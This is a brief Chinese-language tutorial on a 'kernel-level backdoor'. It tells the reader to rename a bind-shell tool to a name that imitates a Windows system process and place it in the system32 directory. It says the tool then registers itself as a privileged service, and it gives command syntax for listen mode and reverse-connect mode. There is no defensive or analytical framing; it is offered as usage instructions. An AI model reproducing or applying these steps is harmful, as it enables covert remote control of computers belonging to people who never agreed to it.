内核级后门

　运行前先将 ntbindshell.exe改名为rsmss.exe并拷贝至%windir%\system32（这个目录有一点系统方面知识地应该知道，这是一个环境变量，指的就是我们常说的系统目录，其实我在测试中发现，不一定要拷在系统目录下，监听功能同样会产生效果，等会儿我们试一试就知道了！)此程序将在第一次启动时自动注册为系统服务，并享有所有权限。

　　后门使用方法
　　正常监听模式：rsmss port
　　反弹连接模式：rsmss port host